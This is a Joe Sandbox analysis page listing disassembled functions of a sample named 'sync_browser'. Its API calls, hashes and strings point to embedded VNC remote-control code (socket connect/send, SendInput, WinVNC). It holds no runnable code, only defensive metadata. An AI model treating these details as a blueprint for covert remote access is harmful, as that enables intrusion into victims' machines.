Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$AddressLibraryLoadProcmalloc
String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
API String ID: 1369618222-3178290357
Opcode ID: ec845a1546a5472c739e5f35f5096180fd3e56c987b1b97795850a6a8f9d0181
Instruction ID: 43a73e143d55ee5e369ddde06c0d16d8005c091d53052f3822e4f6e14faf1c2e
Opcode Fuzzy Hash: ec845a1546a5472c739e5f35f5096180fd3e56c987b1b97795850a6a8f9d0181
Instruction Fuzzy Hash: 00B1F733625BD1A6E348CF28EA443DDB7A8F754B44F14422AE3A847B91DF7A6076C740

Function 00007FF67E857B50 Relevance: 10.6, APIs: 7, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E857B61
GetLastError.KERNEL32 ref: 00007FF67E857BC9
SetThreadPriority.KERNELBASE ref: 00007FF67E857C1D
GetLastError.KERNEL32 ref: 00007FF67E857C27
ResumeThread.KERNELBASE ref: 00007FF67E857C47
GetLastError.KERNEL32 ref: 00007FF67E857C52
LeaveCriticalSection.KERNEL32 ref: 00007FF67E857C79

Part of subcall function 00007FF67E882950: RaiseException.KERNEL32 ref: 00007FF67E8829CB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
String ID:
API String ID: 1366308849-0
Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction ID: 028dd7c2f5d3802b88072c2bb491460581d36a1e01f3db12b4fbb943b44c3fe0
Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction Fuzzy Hash: 43315E27E2864296EB109F28E4441A9F3A1FFA5754F104636FA4E836A9DF3DD94DCB00

Function 00007FF67E82CF90 Relevance: 9.1, APIs: 6, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 00007FF67E82CFDC
setsockopt.WS2_32 ref: 00007FF67E82D013
WSAIoctl.WS2_32 ref: 00007FF67E82D07E
getsockname.WS2_32 ref: 00007FF67E82D0AF
getpeername.WS2_32 ref: 00007FF67E82D0DE
SetPerTcpConnectionEStats.IPHLPAPI ref: 00007FF67E82D128

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
String ID:
API String ID: 2120259006-0
Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction ID: 6a1889e54ec34e2b5d3bf6e4314dab99da75b5a0cecb38fb268fc0b3d83706b2
Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction Fuzzy Hash: DF513273614B81DEE764CF24D4843A9B7A4FB4870CF008526EB5C87A48DF38E6A9CB50

Function 00007FF67E88285C Relevance: 9.1, APIs: 6, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 00007FF67E882887
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E882892
_getptd.LIBCMT ref: 00007FF67E8828B8
CreateThread.KERNELBASE ref: 00007FF67E88290D
GetLastError.KERNEL32 ref: 00007FF67E882918
free.LIBCMT ref: 00007FF67E882923

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 3283625137-0
Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction ID: 4de4535abaf53011602d8d6a00126c410d31a7cd33f436fcd75e27580640cc08
Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction Fuzzy Hash: 2F21B622A2878285F6149BA5E8416ADF294FF64B90F444635FE9D837D6CF3CE018C700

Function 00007FF67E7D3FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameA.KERNEL32 ref: 00007FF67E7D409C
LoadLibraryA.KERNELBASE ref: 00007FF67E7D40D7

Strings

RICHED32.DLL, xrefs: 00007FF67E7D40D0
Rich Edit Dll Loading, xrefs: 00007FF67E7D40EA
Unable to load the Rich Edit (RICHED32.DLL) control!, xrefs: 00007FF67E7D40F1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ComputerLibraryLoadName
String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
API String ID: 2278097360-3189507618
Opcode ID: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
Instruction ID: 41df3cc95b198bef93cac32a48cd47756116e468d903f24ebc7d19abfaed68e7
Opcode Fuzzy Hash: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
Instruction Fuzzy Hash: 7331C223B29B4285FB54DB6AF4543296791EFA5B44F044138EA4E873E5EF3ED448C350

Function 00007FF67E82A320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExA.USER32 ref: 00007FF67E82A34F
GetWindowThreadProcessId.USER32 ref: 00007FF67E82A36A
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67E82AB1F,?,?,?,00007FF67E7E7FB2), ref: 00007FF67E82A370
PostMessageA.USER32 ref: 00007FF67E82A387

Strings

WinVNC Tray Icon, xrefs: 00007FF67E82A340

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindMessagePostThread
String ID: WinVNC Tray Icon
API String ID: 2660421340-1071638575
Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction ID: 8a71e9ca9fd8dd6217ec35e6095cf05d52864f646cd770efc4db33ae88f5fb53
Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction Fuzzy Hash: A4018622A18B8181E7049F96B8544A6F764FF58BD4F544036FE4E87B65DE3CD489C700

Function 00007FF67E7E33A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF67E7E33D3

Strings

vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF67E7E3490
vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF67E7E3429
vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF67E7E3502
vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF67E7E33D9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
API String ID: 1452528299-2001727811
Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction ID: 824ebceff60d280c24bb56946e6e129e07af2b5729f9c875cbc96997eae78df3
Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction Fuzzy Hash: 21410867A15B4291EB818F26D4883FC27A5EBA4F48F588072DE0D8B7A4DF3DD489C310

Function 00007FF67E7E88A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF67E7E88F0
inet_ntoa.WS2_32 ref: 00007FF67E7E88FA

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7E894B

Part of subcall function 00007FF67E8579A0: EnterCriticalSection.KERNEL32 ref: 00007FF67E8579C7
Part of subcall function 00007FF67E8579A0: LeaveCriticalSection.KERNEL32 ref: 00007FF67E8579E9
Part of subcall function 00007FF67E8579A0: CreateSemaphoreA.KERNEL32 ref: 00007FF67E857A03
Part of subcall function 00007FF67E8579A0: GetLastError.KERNEL32 ref: 00007FF67E857A15

Strings

<unavailable>, xrefs: 00007FF67E7E8900

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
String ID: <unavailable>
API String ID: 4131039871-1096956887
Opcode ID: ff450a747a61d37f55c44f9c17d51056de1f571cc6db6c55958413c7f3242baf
Instruction ID: 98243f43cfd32d06a3523627d9beb74afdf58b10796eabb6ddf09bef67d8580d
Opcode Fuzzy Hash: ff450a747a61d37f55c44f9c17d51056de1f571cc6db6c55958413c7f3242baf
Instruction Fuzzy Hash: EB314B33A29F81C2E7548F64E8443A9B3A4FB98B94F140135EA9D8B7A4DF3DD459C740

Function 00007FF67E82CD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF67E82CD7A
gethostbyname.WS2_32 ref: 00007FF67E82CD8C
htons.WS2_32 ref: 00007FF67E82CDB1
connect.WS2_32 ref: 00007FF67E82CDCB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: connectgethostbynamehtonsinet_addr
String ID:
API String ID: 599670773-0
Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
Instruction ID: a62ea1ca160ecba8b250faa43441db8d7183be6f194da7b4bae7d5d7cc171c15
Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
Instruction Fuzzy Hash: B6118663A28A4186EB659B25E840339B7A4FFA8B95F004235FE5EC7794DF3CD544C704

Function 00007FF67E877978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 00007FF67E877986
malloc.LIBCMT ref: 00007FF67E877992

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

Strings

bad allocation, xrefs: 00007FF67E8779CF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$AllocHeapmalloc
String ID: bad allocation
API String ID: 3727741168-2104205924
Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction ID: cebfe6409e5de3d2a4e57928c6f63101d3bad5db1b9c8bd8e0603ad27eba96ce
Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction Fuzzy Hash: D9010C67F3974795EA10EB90E8401B8A3A0BF78381F541135F98DC66A2EE7DE54CC700

Function 00007FF67E82A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00007FF67E82A2C2
PostMessageA.USER32 ref: 00007FF67E82A2E8

Strings

WinVNC Tray Icon, xrefs: 00007FF67E82A2B9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: FindMessagePostWindow
String ID: WinVNC Tray Icon
API String ID: 2578315405-1071638575
Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction ID: a4679c82f76ecde7aaf22bb526eff6122728e99ca192beb3b614b1e1fc01396b
Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction Fuzzy Hash: D9018423E3864181EB54CB46F44426AA294FFA8BD8F485072FE5E87759DE7CD8998B00

Function 00007FF67E82CC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FF67E82CC70
closesocket.WS2_32 ref: 00007FF67E82CC7A

Strings

vsocket.cpp : closing socket, xrefs: 00007FF67E82CC4F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: vsocket.cpp : closing socket
API String ID: 572888783-2569437896
Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction ID: ccd4c9a1de0c5081b68152c765ce89a229e7def7c701f887798dcd83a7f10840
Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction Fuzzy Hash: 47F03776A20A4182EB159F74C4942A87325FFA8B15F244635E92E86295DF3CD459C340

Function 00007FF67E82DD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FF67E82DE1D
__WSAFDIsSet.WS2_32 ref: 00007FF67E82DE5D
send.WS2_32 ref: 00007FF67E82DE78

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: selectsend
String ID:
API String ID: 2999949978-0
Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction ID: 6943e49e28e1093160f7c4fd199a5ce76b17605bbba1bc61fd122001186f87cc
